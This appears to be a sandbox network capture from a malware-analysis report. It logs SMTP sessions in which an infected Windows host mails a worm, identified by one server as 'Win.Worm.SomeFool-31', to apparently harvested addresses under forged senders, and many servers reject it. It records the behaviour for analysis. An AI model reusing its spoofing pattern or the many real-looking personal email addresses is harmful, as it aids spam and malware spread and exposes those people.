                                                                                                                                                                                                          Dec 4, 2023 12:57:09.660744905 CET2549739172.253.115.27192.168.2.4250 2.1.0 OK w20-20020a05620a0e9400b0077bd0142498si8823806qkm.756 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.662106991 CET4973925192.168.2.4172.253.115.27RCPT TO: <fyzlman@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.787641048 CET2549737172.253.115.27192.168.2.4250 2.1.5 OK ou24-20020a05620a621800b0077f0edbec29si1657990qkn.537 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.788943052 CET4973725192.168.2.4172.253.115.27DATA
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.835818052 CET2549736172.253.115.27192.168.2.4250 2.1.5 OK vy11-20020a05620a490b00b0077d6c4bdccbsi8971813qkn.421 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.837755919 CET4973625192.168.2.4172.253.115.27DATA
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.889794111 CET2549738172.253.115.27192.168.2.4250 2.1.5 OK s10-20020a05620a0bca00b0077dc5232909si9606134qki.85 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.891865969 CET4973825192.168.2.4172.253.115.27DATA
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.897653103 CET2549737172.253.115.27192.168.2.4354 Go ahead ou24-20020a05620a621800b0077f0edbec29si1657990qkn.537 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.902781010 CET2549739172.253.115.27192.168.2.4250 2.1.5 OK w20-20020a05620a0e9400b0077bd0142498si8823806qkm.756 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.904200077 CET4973925192.168.2.4172.253.115.27DATA
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.947329998 CET2549736172.253.115.27192.168.2.4354 Go ahead vy11-20020a05620a490b00b0077d6c4bdccbsi8971813qkn.421 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.000849009 CET2549738172.253.115.27192.168.2.4354 Go ahead s10-20020a05620a0bca00b0077dc5232909si9606134qki.85 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.019728899 CET2549739172.253.115.27192.168.2.4354 Go ahead w20-20020a05620a0e9400b0077bd0142498si8823806qkm.756 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:15.269893885 CET2549737172.253.115.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. ou24-20020a05620a621800b0077f0edbec29si1657990qkn.537 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:15.270226002 CET2549738172.253.115.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. s10-20020a05620a0bca00b0077dc5232909si9606134qki.85 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:15.365370035 CET2549736172.253.115.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. vy11-20020a05620a490b00b0077d6c4bdccbsi8971813qkn.421 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:15.411165953 CET2549739172.253.115.27192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. w20-20020a05620a0e9400b0077bd0142498si8823806qkm.756 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.390794992 CET2549744185.183.28.235192.168.2.4220 mx08-00377f01.pphosted.com ESMTP mfa-m0169133
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.392258883 CET4974425192.168.2.4185.183.28.235EHLO northcoast.com
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.466562033 CET2549742173.228.157.41192.168.2.4220 pb-mx22.pobox.com ESMTP Postfix
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.468023062 CET4974225192.168.2.4173.228.157.41EHLO pobox.com
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.577033997 CET2549744185.183.28.235192.168.2.4250-mx08-00377f01.pphosted.com Hello [102.165.48.83], pleased to meet you
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250 STARTTLS
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.580765963 CET4974425192.168.2.4185.183.28.235MAIL FROM: <biljir@pobox.com>
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.632286072 CET2549742173.228.157.41192.168.2.4250-pb-mx22.pobox.com
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-SIZE 36700160
                                                                                                                                                                                                          250-ETRN
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250 8BITMIME
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.634677887 CET4974225192.168.2.4173.228.157.41MAIL FROM: <sdx-cardview-caret-rtl@2x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.769037962 CET2549744185.183.28.235192.168.2.4250 2.1.0 Sender ok
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.769509077 CET4974425192.168.2.4185.183.28.235RCPT TO: <grady@northcoast.com>
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.799767971 CET2549742173.228.157.41192.168.2.4250 2.1.0 Ok
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.800110102 CET4974225192.168.2.4173.228.157.41RCPT TO: <biljir@pobox.com>
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.962094069 CET2549744185.183.28.235192.168.2.4250 2.1.5 Recipient ok
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.963985920 CET4974425192.168.2.4185.183.28.235DATA
                                                                                                                                                                                                          Dec 4, 2023 12:58:05.160917044 CET2549744185.183.28.235192.168.2.4354 Enter mail, end with "." on a line by itself
                                                                                                                                                                                                          Dec 4, 2023 12:58:05.212249041 CET2549742173.228.157.41192.168.2.4450 4.1.8 <sdx-cardview-caret-rtl@2x.png>: Sender address rejected: Domain not found
                                                                                                                                                                                                          Dec 4, 2023 12:58:05.247023106 CET254974351.81.61.70192.168.2.4550 5.7.1 Connection refused - ELNK001_105 - https://postmaster-earthlink.vadesecure.com/inbound_error_codes/#_105
                                                                                                                                                                                                          Dec 4, 2023 12:58:06.302701950 CET2549744185.183.28.235192.168.2.4250 2.0.0 3uqx45uy3u-1 Message accepted for delivery
                                                                                                                                                                                                          Dec 4, 2023 12:58:06.303958893 CET4974425192.168.2.4185.183.28.235QUIT
                                                                                                                                                                                                          Dec 4, 2023 12:58:06.483354092 CET2549744185.183.28.235192.168.2.4221 2.0.0 mx08-00377f01.pphosted.com Closing connection
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.074791908 CET254974764.29.151.236192.168.2.4220 mail158c40.carrierzone.com ESMTP Sendmail 8.14.9/8.13.1; Mon, 4 Dec 2023 06:58:07 -0500
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.077023029 CET4974725192.168.2.464.29.151.236EHLO theriver.com
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.244201899 CET254974764.29.151.236192.168.2.4250-mail158c40.carrierzone.com Hello [102.165.48.83], pleased to meet you
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                                          250-DSN
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-DELIVERBY
                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.247546911 CET4974725192.168.2.464.29.151.236MAIL FROM: <thegrendel@theriver.com>
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.390538931 CET2549745192.254.190.168192.168.2.4220-gator3194.hostgator.com ESMTP Exim 4.95 #2 Mon, 04 Dec 2023 05:58:10 -0600
                                                                                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.393624067 CET4974525192.168.2.4192.254.190.168EHLO onlineconnections.com.au
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.467103958 CET254974764.29.151.236192.168.2.4250 2.1.0 <thegrendel@theriver.com>... Sender ok
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.469120026 CET4974725192.168.2.464.29.151.236RCPT TO: <thegrendel@theriver.com>
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.574157953 CET2549745192.254.190.168192.168.2.4250-gator3194.hostgator.com Hello onlineconnections.com.au [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-PIPE_CONNECT
                                                                                                                                                                                                          250-AUTH PLAIN LOGIN
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.577294111 CET4974525192.168.2.4192.254.190.168MAIL FROM: <sdx-cardview-caret-rtl@4x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.633285999 CET254974764.29.151.236192.168.2.4550 5.1.1 <thegrendel@theriver.com>... User unknown
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.758744955 CET2549745192.254.190.168192.168.2.4250 OK
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.759236097 CET4974525192.168.2.4192.254.190.168RCPT TO: <audictionary@onlineconnections.com.au>
                                                                                                                                                                                                          Dec 4, 2023 12:58:13.386580944 CET2549746131.111.8.146192.168.2.4220 ppsw-30.srv.uis.cam.ac.uk (mx.cam.ac.uk [131.111.8.146]:25) ESMTP Exim 4.96.2-0 Mon, 04 Dec 2023 11:58:13 +0000
                                                                                                                                                                                                          Dec 4, 2023 12:58:13.389178991 CET4974625192.168.2.4131.111.8.146EHLO cl.cam.ac.uk
                                                                                                                                                                                                          Dec 4, 2023 12:58:16.033025026 CET2549745192.254.190.168192.168.2.4550 No Such User Here"
                                                                                                                                                                                                          Dec 4, 2023 12:58:16.213825941 CET2549745192.254.190.168192.168.2.4421 gator3194.hostgator.com lost input connection
                                                                                                                                                                                                          Dec 4, 2023 12:58:18.567420006 CET2549746131.111.8.146192.168.2.4250-ppsw-30.srv.uis.cam.ac.uk Hello cl.cam.ac.uk [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 104857600
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-VRFY
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-PIPECONNECT
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                          Dec 4, 2023 12:58:18.569988012 CET4974625192.168.2.4131.111.8.146MAIL FROM: <sdx-cardview-caret-rtl@3x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:58:23.750859022 CET2549746131.111.8.146192.168.2.4250 OK
                                                                                                                                                                                                          Dec 4, 2023 12:58:23.751194954 CET4974625192.168.2.4131.111.8.146RCPT TO: <brian.kelk@cl.cam.ac.uk>
                                                                                                                                                                                                          Dec 4, 2023 12:58:23.927007914 CET2549746131.111.8.146192.168.2.4550 Please use your name when saying HELO (not cl.cam.ac.uk)
                                                                                                                                                                                                          Dec 4, 2023 12:58:24.103753090 CET2549746131.111.8.146192.168.2.4421 ppsw-30.srv.uis.cam.ac.uk lost input connection
                                                                                                                                                                                                          Dec 4, 2023 12:59:07.411947012 CET2549749104.47.66.10192.168.2.4220 MW2NAM12FT017.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 4 Dec 2023 11:59:06 +0000
                                                                                                                                                                                                          Dec 4, 2023 12:59:07.413867950 CET4974925192.168.2.4104.47.66.10EHLO alumni.caltech.edu
                                                                                                                                                                                                          Dec 4, 2023 12:59:07.580202103 CET2549749104.47.66.10192.168.2.4250-MW2NAM12FT017.mail.protection.outlook.com Hello [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-DSN
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-BINARYMIME
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:59:07.587976933 CET4974925192.168.2.4104.47.66.10MAIL FROM: <sdx-cardview-caret-rtl@4x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:59:07.646557093 CET254974885.187.148.2192.168.2.4220-az1-ss24.a2hosting.com ESMTP Exim 4.96.2 #2 Mon, 04 Dec 2023 04:59:07 -0700
                                                                                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                                                                                          Dec 4, 2023 12:59:07.649844885 CET4974825192.168.2.485.187.148.2EHLO gzip.org
                                                                                                                                                                                                          Dec 4, 2023 12:59:07.798666000 CET254974885.187.148.2192.168.2.4250-az1-ss24.a2hosting.com Hello gzip.org [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 78643200
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-PIPECONNECT
                                                                                                                                                                                                          250-AUTH PLAIN LOGIN
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                          Dec 4, 2023 12:59:07.801441908 CET4974825192.168.2.485.187.148.2MAIL FROM: <freetype@nongnu.org>
                                                                                                                                                                                                          Dec 4, 2023 12:59:07.828432083 CET2549749104.47.66.10192.168.2.4250 2.1.0 Sender OK
                                                                                                                                                                                                          Dec 4, 2023 12:59:07.828876972 CET4974925192.168.2.4104.47.66.10RCPT TO: <madler@alumni.caltech.edu>
                                                                                                                                                                                                          Dec 4, 2023 12:59:07.949742079 CET254974885.187.148.2192.168.2.4250 OK
                                                                                                                                                                                                          Dec 4, 2023 12:59:07.950628996 CET4974825192.168.2.485.187.148.2RCPT TO: <jloup@gzip.org>
                                                                                                                                                                                                          Dec 4, 2023 12:59:08.031688929 CET2549749104.47.66.10192.168.2.4550 5.7.606 Access denied, banned sending IP [102.165.48.83]. To request removal from this list please visit https://sender.office.com/ and follow the directions. For more information please go to http://go.microsoft.com/fwlink/?LinkID=526655 AS(1427) [MW2NAM12FT017.eop-nam12.prod.protection.outlook.com 2023-12-04T11:59:07.930Z 08DBF1D6B4D05A51]
                                                                                                                                                                                                          Dec 4, 2023 12:59:08.261878967 CET254974885.187.148.2192.168.2.4250 Accepted
                                                                                                                                                                                                          Dec 4, 2023 12:59:08.262386084 CET4974825192.168.2.485.187.148.2DATA
                                                                                                                                                                                                          Dec 4, 2023 12:59:08.410420895 CET254974885.187.148.2192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                                                                                                                                                          Dec 4, 2023 12:59:08.904768944 CET2549750209.51.188.92192.168.2.4220 eggs.gnu.org ESMTP Exim 4.90_1 Ubuntu Mon, 04 Dec 2023 06:59:08 -0500
                                                                                                                                                                                                          Dec 4, 2023 12:59:08.906450033 CET4975025192.168.2.4209.51.188.92EHLO nongnu.org
                                                                                                                                                                                                          Dec 4, 2023 12:59:08.937808037 CET2549751209.51.188.92192.168.2.4220 eggs.gnu.org ESMTP Exim 4.90_1 Ubuntu Mon, 04 Dec 2023 06:59:08 -0500
                                                                                                                                                                                                          Dec 4, 2023 12:59:08.938978910 CET4975125192.168.2.4209.51.188.92EHLO nongnu.org
                                                                                                                                                                                                          Dec 4, 2023 12:59:09.014094114 CET2549750209.51.188.92192.168.2.4250-eggs.gnu.org Hello nongnu.org [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-PRDR
                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                          Dec 4, 2023 12:59:09.022089005 CET4975025192.168.2.4209.51.188.92MAIL FROM: <greg@kinoho.net>
                                                                                                                                                                                                          Dec 4, 2023 12:59:09.050534964 CET2549751209.51.188.92192.168.2.4250-eggs.gnu.org Hello nongnu.org [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-PRDR
                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                          Dec 4, 2023 12:59:09.056291103 CET4975125192.168.2.4209.51.188.92MAIL FROM: <sdx-cardview-backarrow@4x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:59:09.128688097 CET2549750209.51.188.92192.168.2.4250 OK
                                                                                                                                                                                                          Dec 4, 2023 12:59:09.129240036 CET4975025192.168.2.4209.51.188.92RCPT TO: <freetype@nongnu.org>
                                                                                                                                                                                                          Dec 4, 2023 12:59:09.267806053 CET2549751209.51.188.92192.168.2.4250 OK
                                                                                                                                                                                                          Dec 4, 2023 12:59:09.268045902 CET4975125192.168.2.4209.51.188.92RCPT TO: <freetype-devel@nongnu.org>
                                                                                                                                                                                                          Dec 4, 2023 12:59:09.463277102 CET2549750209.51.188.92192.168.2.4250 OK
                                                                                                                                                                                                          Dec 4, 2023 12:59:09.514920950 CET4975025192.168.2.4209.51.188.92RCPT TO: <freetype@nongnu.org>
                                                                                                                                                                                                          Dec 4, 2023 12:59:09.720871925 CET2549751209.51.188.92192.168.2.4451-You seem to be a Windows machine. Our condolences. Come back later. You are
                                                                                                                                                                                                          451-greylisted for 20 minutes. See http://www.fsf.org/about/systems/greylisting
                                                                                                                                                                                                          451 for more information.
                                                                                                                                                                                                          Dec 4, 2023 12:59:09.831780910 CET2549751209.51.188.92192.168.2.4421 eggs.gnu.org lost input connection
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.244328022 CET254974885.187.148.2192.168.2.4550-This message contains a virus or other harmful content
                                                                                                                                                                                                          550 (Win.Worm.SomeFool-31)
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.284887075 CET2549750209.51.188.92192.168.2.4451-You seem to be a Windows machine. Our condolences. Come back later. You are
                                                                                                                                                                                                          451-greylisted for 20 minutes. See http://www.fsf.org/about/systems/greylisting
                                                                                                                                                                                                          451 for more information.
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.396863937 CET254974885.187.148.2192.168.2.4421 az1-ss24.a2hosting.com lost input connection
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.398962975 CET2549750209.51.188.92192.168.2.4421 eggs.gnu.org lost input connection
                                                                                                                                                                                                          Dec 4, 2023 12:59:11.171377897 CET2549752142.251.167.26192.168.2.4220 mx.google.com ESMTP n5-20020a0cec45000000b0067aa80f3cb7si5068157qvq.523 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:11.172774076 CET4975225192.168.2.4142.251.167.26EHLO kinoho.net
                                                                                                                                                                                                          Dec 4, 2023 12:59:11.306829929 CET2549752142.251.167.26192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:59:11.309509993 CET4975225192.168.2.4142.251.167.26MAIL FROM: <sdx-cardview-separator@2x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:59:11.441735029 CET2549752142.251.167.26192.168.2.4250 2.1.0 OK n5-20020a0cec45000000b0067aa80f3cb7si5068157qvq.523 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:11.444025993 CET4975225192.168.2.4142.251.167.26RCPT TO: <greg@kinoho.net>
                                                                                                                                                                                                          Dec 4, 2023 12:59:11.597873926 CET2549752142.251.167.26192.168.2.4250 2.1.5 OK n5-20020a0cec45000000b0067aa80f3cb7si5068157qvq.523 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:11.599112988 CET4975225192.168.2.4142.251.167.26DATA
                                                                                                                                                                                                          Dec 4, 2023 12:59:11.734690905 CET2549752142.251.167.26192.168.2.4354 Go ahead n5-20020a0cec45000000b0067aa80f3cb7si5068157qvq.523 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:12.964165926 CET2549752142.251.167.26192.168.2.4550-5.7.1 [102.165.48.83] Messages missing a valid Message-ID header are not
                                                                                                                                                                                                          550-5.7.1 accepted. Please visit
                                                                                                                                                                                                          550-5.7.1 https://support.google.com/mail/?p=RfcMessageNonCompliant and review
                                                                                                                                                                                                          550 5.7.1 RFC 5322 specifications for more information. n5-20020a0cec45000000b0067aa80f3cb7si5068157qvq.523 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.584815979 CET2549753142.251.16.27192.168.2.4220 mx.google.com ESMTP bz22-20020a05622a1e9600b0041985eb503csi9466275qtb.693 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.587438107 CET4975325192.168.2.4142.251.16.27EHLO gmail.com
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.589729071 CET2549754142.251.16.27192.168.2.4220 mx.google.com ESMTP ay18-20020a05622a229200b00423a394ff59si9707179qtb.677 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.591233015 CET4975425192.168.2.4142.251.16.27EHLO gmail.com
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.664602041 CET2549755142.251.16.27192.168.2.4220 mx.google.com ESMTP t16-20020a0cef10000000b0067a9b65fe58si6831745qvr.138 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.666456938 CET4975525192.168.2.4142.251.16.27EHLO gmail.com
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.698360920 CET2549753142.251.16.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.701301098 CET4975325192.168.2.4142.251.16.27MAIL FROM: <hoist-non-react-statics@3.3.2>
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.705784082 CET2549754142.251.16.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.708878994 CET4975425192.168.2.4142.251.16.27MAIL FROM: <sdx-cardview-separator@2x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.779486895 CET2549755142.251.16.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.783416033 CET4975525192.168.2.4142.251.16.27MAIL FROM: <merge-styles@8.5.12>
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.808543921 CET2549753142.251.16.27192.168.2.4250 2.1.0 OK bz22-20020a05622a1e9600b0041985eb503csi9466275qtb.693 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.812552929 CET4975325192.168.2.4142.251.16.27RCPT TO: <heineiuo@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.820899010 CET2549754142.251.16.27192.168.2.4250 2.1.0 OK ay18-20020a05622a229200b00423a394ff59si9707179qtb.677 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.823553085 CET4975425192.168.2.4142.251.16.27RCPT TO: <sam.verschueren@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.840111971 CET254975652.101.73.10192.168.2.4220 AM3PEPF0000A790.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 4 Dec 2023 11:59:47 +0000
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.842324018 CET4975625192.168.2.452.101.73.10EHLO outlook.com
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.891308069 CET2549755142.251.16.27192.168.2.4250 2.1.0 OK t16-20020a0cef10000000b0067a9b65fe58si6831745qvr.138 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.892502069 CET4975525192.168.2.4142.251.16.27RCPT TO: <shtylman@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.969553947 CET2549754142.251.16.27192.168.2.4250 2.1.5 OK ay18-20020a05622a229200b00423a394ff59si9707179qtb.677 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.970973969 CET4975425192.168.2.4142.251.16.27DATA
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.021693945 CET254975652.101.73.10192.168.2.4250-AM3PEPF0000A790.mail.protection.outlook.com Hello [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 49283072
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-DSN
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-BINARYMIME
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.025507927 CET4975625192.168.2.452.101.73.10MAIL FROM: <sdx-cardview-backarrow-dark@4x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.062076092 CET2549753142.251.16.27192.168.2.4250 2.1.5 OK bz22-20020a05622a1e9600b0041985eb503csi9466275qtb.693 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.063544035 CET4975325192.168.2.4142.251.16.27DATA
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.083276033 CET2549754142.251.16.27192.168.2.4354 Go ahead ay18-20020a05622a229200b00423a394ff59si9707179qtb.677 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.124229908 CET2549755142.251.16.27192.168.2.4250 2.1.5 OK t16-20020a0cef10000000b0067a9b65fe58si6831745qvr.138 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.130999088 CET4975525192.168.2.4142.251.16.27DATA
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.171211004 CET2549753142.251.16.27192.168.2.4354 Go ahead bz22-20020a05622a1e9600b0041985eb503csi9466275qtb.693 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.205054045 CET254975652.101.73.10192.168.2.4550 5.7.1 Service unavailable, Client host [102.165.48.83] blocked using Spamhaus. To request removal from this list see https://www.spamhaus.org/query/ip/102.165.48.83 (AS3130). [AM3PEPF0000A790.eurprd04.prod.outlook.com 2023-12-04T11:59:48.097Z 08DBF2DCDFE412AB]
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.238488913 CET2549755142.251.16.27192.168.2.4354 Go ahead t16-20020a0cef10000000b0067a9b65fe58si6831745qvr.138 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.532901049 CET4975425192.168.2.4142.251.16.2756233xFPJU7UXpNYdjQEi204ZmUXFRS2fqRkEh13t
                                                                                                                                                                                                          Lt/Jv4xRU763S7aE1y0l3jdecB6BNIFK/jmgTLf+jFad4sYWvoWcvM1a5WIhvrlnH9UUIk8C
                                                                                                                                                                                                          0AsgV7aGF
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.618958950 CET2549757142.251.16.27192.168.2.4220 mx.google.com ESMTP x9-20020a05620a258900b0077dc4c03144si9873936qko.37 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.624104977 CET4975725192.168.2.4142.251.16.27EHLO gmail.com
